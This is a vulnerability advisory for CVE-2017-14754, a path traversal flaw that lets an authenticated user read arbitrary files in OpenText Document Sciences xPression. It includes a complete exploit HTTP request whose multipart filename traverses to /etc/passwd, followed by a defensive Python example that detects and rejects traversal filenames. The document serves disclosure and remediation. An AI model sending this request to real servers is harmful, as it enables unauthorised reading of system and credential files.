Title: OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) - Arbitrary File Read
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14754

Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)

Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)

Arbitrary File Read:
====================
An authenticated user is able to read arbitrary system files due to a path traversal issue.

Vector:
--------
1) Visit https://[...]/xAdmin/html/cm_datasource_summary.jsp and select a data source.
2) Modify and save the data source. The filename of the xsd_datasource_schema_file parameter is vulnerable:

POST /xAdmin/html/cm_datasource_group_xsd.jsp?action=get_schema_m HTTP/1.1
Host: [...]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[...]/xAdmin/html/cm_datasource_group_dispatcher.jsp?action=modify&refresh=yes&group_name=%43%75%73%74%6f%6d%65%72%58%58%45%74%65%73%74%27
Cookie: JSESSIONID=[...]; hideHeaderAndFooter=false
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------11140219741229998994791588049
Content-Length: 1472

-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_group_id"

301
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="group_name"

aaa
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="group_name_old"

aaa
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema_source"

fromServer
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema_location"

aaa.xml
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema_file"; filename="../../../../../../../../../../../../../../../../etc/passwd"
Content-Type: application/octet-stream

-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="delimiter_xpath"

e
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="customer_key_xpath"

e
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema"

-----------------------------11140219741229998994791588049--

In response, file contents are returned:

HTTP/1.1 200 OK
[...]
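The root cause above is a server-side file handler that trusts the client-supplied filename= value of a multipart part. The following is an added example (not xPression's code and not the vendor's fix) of how such a handler should treat that value: extract it, refuse anything containing path separators or ".." segments, and re-check the resolved path against the upload directory. The base directory name and the helper names are assumptions.

```python
import os
import posixpath
import re
from typing import Optional

# Constructed sample: the Content-Disposition header of the vulnerable part
# from the advisory's request, with the traversal filename as submitted.
SAMPLE_DISPOSITION = (
    'form-data; name="xsd_datasource_schema_file"; '
    'filename="../../../../../../../../../../../../../../../../etc/passwd"'
)

_FILENAME_RE = re.compile(r'filename="([^"]*)"')


def filename_from_disposition(header: str) -> Optional[str]:
    """Return the raw filename= value of a multipart Content-Disposition header, or None."""
    m = _FILENAME_RE.search(header)
    return m.group(1) if m else None


def is_traversal(filename: str) -> bool:
    """True when the client-supplied filename is absolute or contains a '..' segment."""
    # Treat backslashes as separators too, so Windows-style traversal is caught.
    normalised = filename.replace("\\", "/")
    if normalised.startswith("/") or re.match(r"^[A-Za-z]:", normalised):
        return True
    return any(seg == ".." for seg in normalised.split("/"))


def safe_schema_path(base_dir: str, filename: Optional[str]) -> Optional[str]:
    """Resolve an uploaded schema name inside base_dir; None if it would escape.

    Only the basename is ever used, and the joined path is normalised and
    checked against base_dir again as defence in depth.
    """
    if not filename or is_traversal(filename):
        return None
    name = posixpath.basename(filename)
    if name in ("", ".", ".."):
        return None
    base = os.path.abspath(base_dir)
    candidate = os.path.abspath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate
```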